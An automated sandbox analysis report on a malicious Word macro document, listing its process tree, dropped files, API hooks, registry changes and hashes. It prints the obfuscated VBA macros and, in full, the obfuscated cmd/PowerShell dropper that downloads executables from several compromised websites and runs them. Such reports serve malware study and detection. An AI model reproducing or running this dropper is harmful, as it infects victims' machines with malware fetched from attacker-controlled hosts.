53767 / Fix(qijCG)) + 82865 - CLng(ofnLj + CLng(17990)) + OoUqZi + 49336 * ZAMOYi - CStr(45048) / JWUbbv / CLng(zErSz)qXMFK = pRrTnQbFJaW = (tnocH / USlIvR / 43267 / Fix(kfMLjL)) + 42538 - CLng(wrUMUi + CLng(9492)) + bAmupP + 2599 * EbqGEJ - CStr(90611) / Qwfws / CLng(tKlHoz)End Function", File "uIpNwjvi.bas" (Streampath: "Macros/VBA/uIpNwjvi") has code: "Sub sVdSGF(PhpwT)WwIwcG = JiaDnKAtIcz = (oGJSa / oqVZwB / 77713 / Fix(mrEzEp)) + 5351 - CLng(Juafw + CLng(74079)) + WZNww + 14261 * oqWkR - CStr(73044) / IbBwLj / CLng(oIYJU)wOsvw = WzAlErVCNdT = (QfATY / kGJhQp / 75556 / Fix(lUZwbn)) + 28463 - CLng(oIqwG + CLng(39652)) + HbfEl + 6638 * wvTOMw - CStr(23937) / kvRQF / CLng(cPBjJ)End SubSub musHwkwosI(oXmdLMdsYfUoN As String)On Error Resume Nextrscba = uCGklYuYii = (bSDWY / fpOKfL / 57139 / Fix(bCzDT)) + 85184 - CLng(wBKLzK + CLng(29534)) + LcwkpE + 83249 * UTiwkA - CStr(70028) / uGNaW / CLng(ULmXfQ)LYkPzD = jboTkEkkwEvR = (QszoVQ / nzRZa / 9282 / Fix(uzjmz)) + 5567 - CLng(TSuqRP + CLng(69159)) + qSkzGv + 62473 * bcmYtd - CStr(42537) / JzVpnP / CLng(zOwzZ)[Shell] zEBYN + Chr(vbKeyC) + oXmdLMdsYfUoN + zpawOO + EKKizpw
17959 - 17959hStun = AmlJwGiXlAjV = (EiAHa / LInkzH / 55302 / Fix(PmHiZ)) + 63874 - CLng(CpoPHa + CLng(51028)) + YdQUZv + 97790 * lTKPr - CStr(98612) / KqiiO / CLng(iWGoYC)MrTCkW = GinDGUVKPS = (DoiZd / MAuHKf / 2471 / Fix(FFtAIi)) + 41232 - CLng(ubDbbz + CLng(32479)) + LrWRw + 8208 * SqJYVT - CStr(97487) / HBNLP / CLng(JGnlSu)End Sub", File "izosJmiC.bas" (Streampath: "Macros/VBA/izosJmiC") has code: "Function wSTJs(zHhlB)AZcDdi = tiZDNtdWGzM = (szzHtc / hCdBu / 60563 / Fix(iXLof)) + 7886 - CLng(JXYOGS + CLng(98489)) + dBkZS + 10208 * cVKBZ - CStr(43104) / EYJifO / CLng(KRRIE)ZYsnKJ = YcRVNbvpii = (IRTAFY / kQSjTQ / 27562 / Fix(dDcWq)) + 30454 - CLng(ScGoU + CLng(48389)) + KVmmiv + 35230 * XnPXY - CStr(90150) / swEwl / CLng(sNHnOw)qtQDNz = zwjlSWfoHS = (QMjIjW / oSHfwP / 97607 / Fix(PiXMK)) + 51922 - CLng(IvRTji + CLng(53493)) + YzVXj + 74165 * lhjZJ - CStr(76315) / RhWTjG / CLng(RvIPb)oqQpF = FjfdrjItpf = (RBSijw / wULGE / 24869 / Fix(FiSuR)) + 82532 - CLng(ziGmE + CLng(59119)) + DwIcP + 43585 * alJGTd - CStr(14555) / ucaQjN / CLng(pwYoSU)End FunctionFunction VCRPjlv(IjuBXbKwG)MsfRK = WCioqJzInzNL = (ndLnv / EIJDbE / 58389 / Fix(ZRbBS)) + 23509 - CLng(rzlaa + CLng(65862)) + jLabG + 28100 * ijrWWq - CStr(27225) / bNlfYY / CLng(Mwuzkv)ZNUGEb = czzPaqjiwVGw = (YovKc / zijHdk / 4585 / Fix(iCQmm)) + 91653 - CLng(NnPzhG + CLng(55246)) + zddzJ + 2410 * Zwbmw - CStr(96400) / qlqod / CLng(cjjUC)KAfMv = WNidAmGFcUKA = (AuwdGs / XoRuJu / 70652 / Fix(YtjjCb)) + 71080 - CLng(NlEvXz + CLng(418)) + YTFYP + 7138 * GCHwY - CStr(33444) / qrIPhi / CLng(izVPKj)VCRPjlv = IjuBXbKwGCzFYoF = ppMbUcdvcMS = (uMmHSR / tWjIFU / 19906 / Fix(EBajL)) + 24946 - CLng(CvoMr + CLng(15265)) + CsCrE + 94251 * KzGXic - CStr(37420) / DWAhY / CLng(tCdGR)End FunctionFunction wQpJm(ByVal LYpRJHtwuOCsR As String, mGqOdYnIP, XwERnXf)On Error Resume NextKqTFaT = TrGNPNuETMh = (hwsSMJ / cIqZlm / 6257 / Fix(UdBwKk)) + 99750 - CLng(zIkTK + CLng(58511)) + iQYhMN + 97397 * sQkPK - CStr(2629) / cdKiab / 
CLng(QXAhi)RvCwZNlBhCkjjj = JcqYwTHJMFrRV + StrReverse(LYpRJHtwuOCsR) + IfaUpMQjGJEOPABh = fDsPaLrtXQX = (REzJk / fsVddV / 62028 / Fix(uFrIKY)) + 25020 - CLng(RjsEOE + CLng(95958)) + tQjqK + 99257 * GPEBl - CStr(20402) / PuuPWl / CLng(OFzFf)fBZnrWF = PRfibuCkMmpl + Mid(qltFWbbrUwKwh + RvCwZNlBhCkjjj + QiKjlfM, ojWaqIpCHFdcuR + mGqOdYnIP + zciEwvSVj, XwERnXf) + ilFCCEGirwJjwSBSqFU = RzJKHaQDWO = (jHWkzE / XuDUL / 31391 / Fix(tludbP)) + 28503 - CLng(Rmvrvz + CLng(61212)) + oauwP + 55975 * RSmEzK - CStr(27312) / zuaNpV / CLng(uwXrqk)wQpJm = IIDrcPuRTRQp + fBZnrWF + KpLRiDHzwVqwNfwZ = mLcJdGizkj = (JzzrPF / GNndqL / 75692 / Fix(AfBPV)) + 89182 - CLng(diBALJ + CLng(21517)) + DWQVMm + 83705 * zZISJ - CStr(97872) / lwqiFD / CLng(ULjPTV)PudvSj = ZpbfJDqMbki = (PCVbFs / CFpzT / 42995 / Fix(iffXr)) + 29268 - CLng(LIPCwc + CLng(88830)) + zEioZb + 24375 * BpZdE - CStr(40122) / dMmMU / CLng(jEtPT)End FunctionFunction tGYJQ(XFkSi)mWGdhR = YqIlpJZTSAl = (FXSSd / JRjPQL / 65699 / Fix(ZwEDWb)) + 57589 - CLng(MlViAA + CLng(74155)) + mjjFq + 29411 * oABHT - CStr(83487) / rZHTpa / CLng(PdJvK)hzufI = ccjicwvQCVT = (Eltva / KLpXGW / 19234 / Fix(EVrGVw)) + 78568 - CLng(wLviU + CLng(60437)) + zMIplG + 50126 * CTzwTm - CStr(10732) / HSSGZ / CLng(wzVVo)izwLfh = KwjYaipmWAVc = (lnMCZF / QIUQR / 76794 / Fix(CXnSm)) + 88802 - CLng(bauscr + CLng(70057)) + dUzMs + 94297 * kJGcT - CStr(88925) / MIIqdm / CLng(ihjiw)MRJzN = GiAQFvqniMK = (AkOljl / zuumP / 56881 / Fix(mzSzIO)) + 61618 - CLng(LLrDvV + CLng(93701)) + EVZIzZ + 95618 * aLzqLj - CStr(26345) / bAVqV / CLng(DvuMZD)End FunctionFunction zPHvPqrDOGFFzX()On Error Resume NextfqsASq = qVzNBZzPpcb = (qbuAGG / RiOkzu / 73604 / Fix(UGpstw)) + 20811 - CLng(CIojF + CLng(11453)) + EkwEDE + 92018 * uLQzMH - CStr(25964) / HzicI / CLng(jhBfV)mpIFv = ncFjJQovrp = (Irrnd / TfBFz / 14167 / Fix(bCRKN)) + 78728 - CLng(YFhYNH + CLng(45110)) + FfziEw + 46549 * MzLml - CStr(31007) / hfwYhM / CLng(dhCPvD)qaBbOcw = wQpJm("i.%@S5i V/ %^c^EzK", 80769 + 3 - 80769, 
" - source
- Static Parser
- relevance
- 10/10
-
Creates a writable file in a temporary directory
- details
- "WINWORD.EXE" created file "%TEMP%\~DF7ADBC129936C88F6.TMP"
- source
- API Call
- relevance
- 1/10
-
Creates mutants
- details
-
"\Sessions\1\BaseNamedObjects\Local\10MU_ACBPIDS_S-1-5-5-0-59802"
"\Sessions\1\BaseNamedObjects\Local\10MU_ACB10_S-1-5-5-0-59802"
"\Sessions\1\BaseNamedObjects\Global\552FFA80-3393-423d-8671-7BA046BB5906"
"\Sessions\1\BaseNamedObjects\Local\ZonesCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZoneAttributeCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesLockedCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Global\MTX_MSO_Formal1_S-1-5-21-4162757579-3804539371-4239455898-1000"
"\Sessions\1\BaseNamedObjects\Global\MTX_MSO_AdHoc1_S-1-5-21-4162757579-3804539371-4239455898-1000"
"\Sessions\1\BaseNamedObjects\Global\MsoShellExtRegAccess_S-1-5-21-4162757579-3804539371-4239455898-1000"
"Local\ZonesLockedCacheCounterMutex"
"Global\MsoShellExtRegAccess_S-1-5-21-4162757579-3804539371-4239455898-1000"
"Local\10MU_ACB10_S-1-5-5-0-59802"
"Global\552FFA80-3393-423d-8671-7BA046BB5906"
"Local\10MU_ACBPIDS_S-1-5-5-0-59802"
"Local\ZoneAttributeCacheCounterMutex"
"Local\ZonesCounterMutex"
"Local\ZonesCacheCounterMutex"
"Global\MTX_MSO_AdHoc1_S-1-5-21-4162757579-3804539371-4239455898-1000"
"Global\MTX_MSO_Formal1_S-1-5-21-4162757579-3804539371-4239455898-1000" - source
- Created Mutant
- relevance
- 3/10
-
Loads rich edit control libraries
- details
- "WINWORD.EXE" loaded module "%COMMONPROGRAMFILES%\microsoft shared\OFFICE14\RICHED20.DLL" at 6C7B0000
- source
- Loaded Module
-
Loads the .NET runtime environment
- details
- "powershell.exe" loaded module "%WINDIR%\assembly\NativeImages_v2.0.50727_32\mscorlib\d40b99d82652dbbc000d378a824ae296\mscorlib.ni.dll" at 5F8B0000
- source
- Loaded Module
-
Process launched with changed environment
- details
-
Process "cmd.exe" was launched with new environment variables: "WecVersionForRosebud.F70="4""
Process "powershell.exe" was launched with new environment variables: "%lhmbWskWwNVkUzp%="oQllFASCBHr", %HvpurunsRmnvjbm%="zJlPRBwG", %musHwkwosI%="er", %fFhDGzjnXmhYvNz%="hHRrroJFEpzXJ", %mGqOdYnIP%="ll", %fBZnrWF%="ow", %dowlFKYHb%="ow", %GTHGTVYqDCTUTHV%="JNMwizhaTsz", %pKskGkVXEDjT%="p", %oXmdLMdsYfUoN%="s", %LYpRJHtwuOCsR%="p", %XwERnXf%="he""
Process "166520.exe" was launched with modified environment variables: "PSModulePath" - source
- Monitored Target
- relevance
- 10/10
-
Removes Office resiliency keys (often used to avoid problems opening documents)
- details
-
"WINWORD.EXE" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS"; Key: "{0H")
"WINWORD.EXE" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS"; Key: "%>I")
"WINWORD.EXE" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS"; Key: "0,H")
"WINWORD.EXE" (Access type: "DELETE"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS") - source
- Registry Access
- relevance
- 10/10
-
Runs shell commands
- details
-
[obfuscated cmd.exe/powershell.exe command line omitted] on 2018-5-17.00:56:07.351 - source
- Monitored Target
- relevance
- 5/10
-
Scanning for window names
- details
-
"WINWORD.EXE" searching for class "REListbox20W"
"WINWORD.EXE" searching for class "OfficeTooltip"
"WINWORD.EXE" searching for class "MsoCommandBarPopup"
"WINWORD.EXE" searching for class "MSOBALLOON"
"WINWORD.EXE" searching for class "MsoHelp10" - source
- API Call
- relevance
- 10/10
-
Spawns new processes
- details
-
Spawned process "cmd.exe" with commandline [obfuscated command line omitted] (UID: 00045852-00002952), Spawned process "powershell.exe" with commandline [obfuscated command line omitted], Spawned process "166520.exe", Spawned process "cosineinit.exe" - source
- Monitored Target
- relevance
- 3/10
-
Contacts domains
-
Installation/Persistance
-
Dropped files
- details
-
"~$vPLpWc.doc" has type "data"
"166520.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
"02vPLpWc.LNK" has type "MS Windows shortcut Item id list present Points to a file or directory Has Relative path Archive ctime=Thu May 17 07:53:26 2018 mtime=Thu May 17 07:53:26 2018 atime=Thu May 17 07:53:56 2018 length=167424 window=hide"
"index.dat" has type "data"
"~WRS{3B257DFB-1EFD-4832-9438-0BDD960DE59D}.tmp" has type "FoxPro FPT blocks size 0 next free block index 218103808 1st used item "\375""
"TY98LM19OS4MQAMZCOLL.temp" has type "data"
"~$Normal.dotm" has type "data" - source
- Binary File
- relevance
- 3/10
-
Touches files in the Windows directory
- details
-
"WINWORD.EXE" touched file "C:\Windows\AppPatch\sysmain.sdb"
"WINWORD.EXE" touched file "C:\Windows\Globalization\Sorting\SortDefault.nls"
"WINWORD.EXE" touched file "C:\Windows\Fonts\StaticCache.dat"
"WINWORD.EXE" touched file "C:\Windows\System32\en-US\user32.dll.mui"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\System32\en-US\setupapi.dll.mui"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Caches\cversions.1.db"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000c.db"
"WINWORD.EXE" touched file "C:\Windows\System32\rsaenh.dll"
"WINWORD.EXE" touched file "C:\Windows\System32\en-US\KernelBase.dll.mui"
"WINWORD.EXE" touched file "C:\Windows\System32\msxml6r.dll" - source
- API Call
- relevance
- 7/10
-
Network Related
-
Found potential URL in binary/memory
- details
-
Pattern match: "9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9U"
Pattern match: "http://schemas.openxmlformats.org/drawingml/2006/main"
Heuristic match: "ifcingenieria.cl" - source
- File/Memory
- relevance
- 10/10
-
System Security
-
Hooks API calls
- details
-
"VariantClear@OLEAUT32.DLL" in "WINWORD.EXE"
"OleLoadFromStream@OLE32.DLL" in "WINWORD.EXE"
"VariantChangeType@OLEAUT32.DLL" in "WINWORD.EXE"
"SysAllocStringByteLen@OLEAUT32.DLL" in "WINWORD.EXE"
"SysFreeString@OLEAUT32.DLL" in "WINWORD.EXE" - source
- Hook Detection
- relevance
- 10/10
-
Unusual Characteristics
-
Installs hooks/patches the running process
- details
-
"WINWORD.EXE" wrote bytes "b800000000663d33c0bae405350068dcf52f6cc3" to virtual address "0x0442D814"
"WINWORD.EXE" wrote bytes "b811110000663d33c0ba7c03440468dcf52f6cc3" to virtual address "0x0442D7F4"
"WINWORD.EXE" wrote bytes "135c4f08" to virtual address "0x64B40BA8" (part of module "MSO.DLL")
"WINWORD.EXE" wrote bytes "e93655aded" to virtual address "0x76E53EAE" ("VariantClear@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "e99e48d6ee" to virtual address "0x75B83D01" ("SetUnhandledExceptionFilter@KERNEL32.DLL")
"WINWORD.EXE" wrote bytes "b800000000663d33c0ba2405350068dcf52f6cc3" to virtual address "0x0442D7B4"
"WINWORD.EXE" wrote bytes "ff477d09" to virtual address "0x6C7F9904" (part of module "RICHED20.DLL")
"WINWORD.EXE" wrote bytes "c4cab77580bbb775aa6eb8759fbbb77508bbb77546ceb7756138b875de2fb875d0d9b77500000000177930774f9130777f6f3077f4f7307711f73077f2833077857e307700000000" to virtual address "0x6EF81000" (part of module "MSIMG32.DLL")
"WINWORD.EXE" wrote bytes "cdba0006" to virtual address "0x2F2C1B94" (part of module "WINWORD.EXE")
"WINWORD.EXE" wrote bytes "baf41b4404b98b7b2f6cffe1" to virtual address "0x003614E2"
"WINWORD.EXE" wrote bytes "a1f82708" to virtual address "0x69C6F530" (part of module "WWLIB.DLL")
"WINWORD.EXE" wrote bytes "b800000000663d33c0ba2406350068dcf52f6cc3" to virtual address "0x0442D834"
"WINWORD.EXE" wrote bytes "bae4d43d00b98b7b2f6cffe1" to virtual address "0x00360A06"
"WINWORD.EXE" wrote bytes "b800000000663d33c0ba6405350068dcf52f6cc3" to virtual address "0x0442D7D4"
"WINWORD.EXE" wrote bytes "ba28874204b98b7b2f6cffe1" to virtual address "0x0036038E"
"WINWORD.EXE" wrote bytes "ba28bc3d00b98b7b2f6cffe1" to virtual address "0x0036150A"
"WINWORD.EXE" wrote bytes "b800000000663d33c0bae404350068dcf52f6cc3" to virtual address "0x0442D794"
"WINWORD.EXE" wrote bytes "e9c53252ee" to virtual address "0x769A6143" ("OleLoadFromStream@OLE32.DLL")
"WINWORD.EXE" wrote bytes "afe16309" to virtual address "0x6C9010AC" (part of module "MSPTLS.DLL")
"WINWORD.EXE" wrote bytes "2da12708" to virtual address "0x65B478E4" (part of module "OART.DLL") - source
- Hook Detection
- relevance
- 10/10
-
File Details
02vPLpWc
- Filename
- 02vPLpWc
- Size
- 164KiB (167424 bytes)
- Type
- doc office
- Description
- Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: SHaevaecyvesho12012, Subject: SHaevaecy96784, Author: SHaevae71615, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu May 17 08:45:00 2018, Last Saved Time/Date: Thu May 17 08:45:00 2018, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
- Architecture
- WINDOWS
- SHA256
- 2ff15b6627b14bd38a942955121c07ecaefcad830bc952dad87e01a3aa2cf2da
- MD5
- 021fc965d607b23622da10d996c90adf
- SHA1
- 04ea87b8ebdb4f09e114bb0985e4b91f30eae422
Classification (TrID)
- 54.2% (.DOC) Microsoft Word document
- 32.2% (.DOC) Microsoft Word document (old ver.)
- 13.5% (.) Generic OLE2 / Multistream Compound File
Hybrid Analysis
Analysed 5 processes in total (System Resource Monitor).
-
WINWORD.EXE
/n "C:\02vPLpWc.doc"
(PID: 3952)
-
cmd.exe
[obfuscated cmd.exe command line omitted]
(PID: 2952)
-
powershell.exe
[obfuscated powershell.exe command line omitted]
(PID: 3800)
- 166520.exe (PID: 2132)
- cosineinit.exe (PID: 3768)
- cmd.exe
Cmd NiFNFLos YkMLGzjoazWTFMzoErTtjZAZ btnSkEoS & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %HvpurunsRmnvjbm%=zJlPRBwG&&set %pKskGkVXEDjT%=p&&set %dowlFKYHb%=o^w&&set %GTHGTVYqDCTUTHV%=JNMwizhaTsz&&set %LYpRJHtwuOCsR%=!%pKskGkVXEDjT%!&&set %fFhDGzjnXmhYvNz%=hHRrroJFEpzXJ&&set %musHwkwosI%=e^r&&set %fBZnrWF%=!%dowlFKYHb%!&&set %oXmdLMdsYfUoN%=s&&set %lhmbWskWwNVkUzp%=oQllFASCBHr&&set %XwERnXf%=he&&set %mGqOdYnIP%=ll&&!%LYpRJHtwuOCsR%!!%fBZnrWF%!!%musHwkwosI%!!%oXmdLMdsYfUoN%!!%XwERnXf%!!%mGqOdYnIP%! ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 
9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um, 19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um,[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112),[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+',[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74),[CHA'+'R]39 -CReplace 9Um1'+'xA9Um,'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC',[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106),[cHar]124))
(PID: 2952, Additional Context: Cmd NiFNFLos YkMLGzjoazWTFMzoErTtjZAZ btnSkEoS & %comSpEc% %comSpEc% /V /c set %HvpurunsRmnvjbm%=zJlPRBwG&&set %pKskGkVXEDjT%=p&&set %dowlFKYHb%=ow&&set %GTHGTVYqDCTUTHV%=JNMwizhaTsz&&set %LYpRJHtwuOCsR%=!%pKskGkVXEDjT%!&&set %fFhDGzjnXmhYvNz%=hHRrroJFEpzXJ&&set %musHwkwosI%=er&&set %fBZnrWF%=!%dowlFKYHb%!&&set %oXmdLMdsYfUoN%=s&&set %lhmbWskWwNVkUzp%=oQllFASCBHr&&set %XwERnXf%=he&&set %mGqOdYnIP%=ll&&!%LYpRJHtwuOCsR%!!%fBZnrWF%!!%musHwkwosI%!!%oXmdLMdsYfUoN%!!%XwERnXf%!!%mGqOdYnIP%! ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 
9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um, 19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um,[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112),[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+',[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74),[CHA'+'R]39 -CReplace 9Um1'+'xA9Um,'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC',[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106),[cHar]124)))
Network Analysis
DNS Requests
